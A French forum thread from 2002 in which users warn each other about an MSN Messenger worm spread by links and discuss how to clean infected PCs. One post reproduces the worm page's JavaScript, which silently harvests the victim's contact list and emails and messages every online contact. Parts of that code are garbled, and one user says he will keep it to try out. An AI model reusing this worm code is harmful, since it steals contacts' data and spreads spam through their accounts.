ATTENTION VIRUS SUR MSN - Windows & Software
Marsh Posté le 14-02-2002 à 14:22:15
c malin de mettre l'url, si il y a des cliqueurs fou qui vienent sur le post et sui ne lisent pas ils vont cliquer dessus
J'ais trois de mes potes qui se sont fait avoir en même temps, c pas trop discret recevoir trois fois le même message de trois personne différentes en moins de trois min PDC
Ils ont tout les trois passé un AV différent ils ne trouvet rien, sur le site o on es envoyé, il y a un truc à downloader, le vrai méchant virus est peut être dedans, il y a quelqu'un qui a testé??????
Marsh Posté le 14-02-2002 à 14:23:35
ben j'ai vu sur des forums de 3D que c t un virus (les pop ups)
Marsh Posté le 14-02-2002 à 14:24:07
rectification il y en a un des trois qui a trouvé un virus (peut être que ça n'a rien avoir mais bon)
C'est JS.Seeker.A
Il y a quelqu'un qui peut m'en dire plus dessus???
Marsh Posté le 14-02-2002 à 14:25:24
Pas de virus la-dedans, mais un bon vieux kit de connexion pour un site Porno qui essaie de se charger tout seul
Bon alors correction, peut-etre que si. Je lui ais pas laisse le temps de tout charger.
[jfdsdjhfuetppo]--Message édité par Wolfman--[/jfdsdjhfuetppo]
Marsh Posté le 14-02-2002 à 14:25:55
je c pas si c ce virus mais moi j'en ai choper un che pa comment mais g des fichier en eml qui ce sont foutu par tout et mon pc sous winxp demare plus du tout aider MOI !!!!!!!
(en me trouvant un antivirus sous dos par exemple ......)
Marsh Posté le 14-02-2002 à 14:27:25
Foutiti a écrit a écrit : je c pas si c ce virus mais moi j'en ai choper un che pa comment mais g des fichier en eml qui ce sont foutu par tout et mon pc sous winxp demare plus du tout aider MOI !!!!!!! (en me trouvant un antivirus sous dos par exemple ......) |
t'avais cliqué sur ce lien ?
Marsh Posté le 14-02-2002 à 14:27:30
Je crois que Norton le fait, (2001 en tout cas) mais le prob c que je l'avais installé sous win avant le prob
Marsh Posté le 14-02-2002 à 14:27:35
Foutiti a écrit a écrit : je c pas si c ce virus mais moi j'en ai choper un che pa comment mais g des fichier en eml qui ce sont foutu par tout et mon pc sous winxp demare plus du tout aider MOI !!!!!!! (en me trouvant un antivirus sous dos par exemple ......) |
Ca c'est un zoli Nimda. Pas trop le choix. Il faut que tu fasses du ménage sous DOS pour essayer de redemarrer, mais à mon avis tu peux deja tout formater.
Marsh Posté le 14-02-2002 à 14:28:33
faire le menage ? cad ?? vire tout les eml ?? g pas fini yen a partout sur tout les dd .......
Marsh Posté le 14-02-2002 à 14:31:24
Je l'ais déjà eu, il a foutu le bordel dans win mais c tout (a part deux MP3) si tu as plusieur partitions pas de prob.
Tu le netois sous dos, tu format ta partition win
Marsh Posté le 14-02-2002 à 14:33:09
Foutiti a écrit a écrit : faire le menage ? cad ?? vire tout les eml ?? g pas fini yen a partout sur tout les dd ....... |
Eh bien si tu veux pas nettoyer les EML, vire quelques dossiers pour liberer de la place sur le disque. Ensuite redemarre et passe un antivirus. Chez Symantec tu peux aussi telecahrger des petits outils specialises pour retirer un virus en particulier, et ils sont gratuits.
Marsh Posté le 14-02-2002 à 14:35:29
Vous êtes sur qu'il y a un virus dedans...
Au fait zic, change ton message, il foue la merde, les cliqueurs fou en prennent plein de la gueule....
Marsh Posté le 14-02-2002 à 14:35:51
mais si j libere de l'espace je vois pas pkoi il devrait demarer ca change koi ?? et pis comment j'accede a une parition ntfs sous dos?
Marsh Posté le 14-02-2002 à 14:37:30
Jef34 a écrit a écrit : Vous êtes sur qu'il y a un virus dedans... Au fait zic, change ton message, il foue la merde, les cliqueurs fou en prennent plein de la gueule.... |
Je lui ais deja dit.
Pour le virus dedans c pas sur, il l'avait peut être déjà avant sans s'en rendre compte.
[jfdsdjhfuetppo]--Message édité par nightmare682--[/jfdsdjhfuetppo]
Marsh Posté le 14-02-2002 à 14:39:56
Il faudrait faire gaffe car l'exe semble être un netbus
---Source Taz ---
Thanks.
Marsh Posté le 14-02-2002 à 14:40:58
En tout cas le code source est très interessant :
--------------------------------------------------
---------------
<html>
<head>
<title>Welcome</title>
<Script>
var msnWin;
var msnList;
var ms">www.cyberialis.com</a> HAHAHAHHAHA ";
function Go(){
msnWin = document.open("res:", "", "fullscreen=1" );
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait... Attendre....";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
focus();
if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";
for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
}
}
document.contents.contentBox.value = msnStr;
}
function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}
</Script><script>azao=window.open('
039;,'azao','toolbar=0,location=
1,status=0,menubar=0,scrollbars=1,width=5,height=5
';</script>
<script>window.open('';</script></he
ad>
<body onload="Go()">
<p align="center">
<p align="center"> </p>
<p align="center"> </p>
<p align="center"> </p>
<p align="center"><font face="Arial">
Please Wait...</font></p>
<form METHOD="POST" ACTION="" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="" ID="Hidden1">
<input type="hidden" name="recipient" value="" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form><meta http-equiv="refresh" content="30;URL=">
</body>
</html>
--------------------------------------------------
---------------
[jfdsdjhfuetppo]--Message édité par krapaud--[/jfdsdjhfuetppo]
Marsh Posté le 14-02-2002 à 14:42:30
Le pire c qu'il envoie un mail au utilisateurs qui ne sont pas en ligne....
Trop fort...
[jfdsdjhfuetppo]--Message édité par Jef34--[/jfdsdjhfuetppo]
Marsh Posté le 14-02-2002 à 15:06:54
Jef34 a écrit a écrit : Le pire c qu'il envoie un mail au utilisateurs qui ne sont pas en ligne.... Trop fort... |
? ?
Marsh Posté le 14-02-2002 à 15:09:05
Foutiti a écrit a écrit : faire le menage ? cad ?? vire tout les eml ?? g pas fini yen a partout sur tout les dd ....... |
del *.eml
Marsh Posté le 14-02-2002 à 15:09:53
fred2k a écrit a écrit : del *.eml |
Eh oui mais si le pauvre doit se trimbaler dans tous les repertoires a la recherche des fichiers il a pas fini
Marsh Posté le 14-02-2002 à 15:14:37
il n'y a pas un truc genre del /s *.eml
Ca marche avec dir pourquoi pas avec del ?
Marsh Posté le 14-02-2002 à 15:20:14
g trouver un prog qui le fait tres bien sous dos mais le prob c que ma partition principal est en ntfs et celle la il la scan pa car il la vois pas je peux faire comment ? (c ptete parceque je boot avec un dikette win mme ?
Marsh Posté le 14-02-2002 à 15:29:27
donc sur le site c i.worm.coolnow (insurektiontest.free.fr)<=fo pa y aller
Marsh Posté le 14-02-2002 à 15:49:33
THE REAL WASSABI a écrit a écrit : ? ? |
Ben ouais.
function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "<br>";
for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
Marsh Posté le 14-02-2002 à 16:06:08
elcatalan a écrit a écrit : pt1 de développeurs ! jamais une ligne de commentaires |
c clair, et après ils gueulent pour avoir le l'Open Source...
Néammoins, je le garde celui là, je tenterai de l'utiliser en local. Reste plus qu'à limiter la liste de ceux qui recoivent le mail...
et Hop au boulot...
Marsh Posté le 14-02-2002 à 16:18:23
kaltan1 a écrit a écrit : pour info elle traite de koi cette url ????? |
LES URLS CI DESSOUS PEUVENT ETRE DANGEREUSES, NE LES LANCEZ PAS.
[00:10] XXXX dit : URGENT - Go to xttp://paparoach.independentday.com/cool Now
[13:39] XXXX dit : A trop excelent va voir !! xttp://insurektiontest.free.fr
[jfdsdjhfuetppo]--Message édité par Master_Jul--[/jfdsdjhfuetppo]
Marsh Posté le 14-02-2002 à 16:19:12
Master_Jul a écrit a écrit : LES URLS CI DESSOUS PEUVENT ETRE DANGEREUSES, NE LES LANCEZ PAS. [00:10] XXXX dit : URGENT - Go to [13:39] XXXX dit : A trop excelent va voir !! |
ok je te remercie c bon a savoir
[jfdsdjhfuetppo]--Message édité par kaltan1--[/jfdsdjhfuetppo]
Marsh Posté le 14-02-2002 à 16:21:17
Master_jul, fais un truc pour que ce ne soient pas des liens, ils y a encore des gens qui vont cliquer dessus. Kaltan fais pareil, merci
Marsh Posté le 14-02-2002 à 16:22:01
elcatalan a écrit a écrit : Master_jul, fais un truc pour que ce ne soient pas des liens, ils y a encore des gens qui vont cliquer dessus. Kaltan fais pareil, merci |
voila
Marsh Posté le 14-02-2002 à 16:24:12
kaltan1 a écrit a écrit : pour info elle traite de koi cette url ????? |
Ben un script javascript qui utilise l'intégration d'IE et MSN Messenger qui avait déjà été déconcé là http://raburton.members.easyspace.com/msn/
et qui envoie un message aux utilisateurs de ta contact list leur disans d'aller sur le meme site ou tu étais. De plus il te propose de télécharger un prog du type carpdiem.exe (en fait kit de connection à un site de cul).
C pas un virus en soit il me semble, et d'ailleurs aucun d'entre nous ne s'en ai plaind. Pour ma part, je n'ai pas téléchargé le .exe non plus, peut être que dedans.... à voir.
Marsh Posté le 14-02-2002 à 23:43:19
oauis mais il est quand meme reloud se truc la il envoie des mail au gens de sa contact list !!! comment on fait pour l'enlever ???
Marsh Posté le 14-02-2002 à 23:45:21
bon je crois que g trouver
http://www.microsoft.com/windows/i [...] wnload.asp
dl le patch...je vous tiens au courant !!
Marsh Posté le 15-02-2002 à 00:10:22
Et bien Symantec n'ont pas prit de temps non plus.
Alors que ca passait sans prob ce matin, cf mes messages sur ce post à env 15h, maintenant
Norton Antivirus CE
c dommage car on pourra plus utiliser le code source... j'arrive meme pas à garder un txt avec le code dedans, norton me le vire et j'ai pas envie de faire d'exclusion...
[jfdsdjhfuetppo]--Message édité par Jef34--[/jfdsdjhfuetppo]
Marsh Posté le 14-02-2002 à 14:07:33
si vous recevez cette url, ne cliquez surtout pas, c'est un virus. si vous cliquez, toute votre contact list recevra le meme message que vous avez recu.
je ne connais pas encore les consequences de ce virus
[jfdsdjhfuetppo]--Message édité par krapaud--[/jfdsdjhfuetppo]
---------------
Mon projet PC Gaming 2000 Athlon SLOT A + Voodoo 5 5500AGP :love: https://www.youtube.com/channel/UCB [...] i2enxMfAQA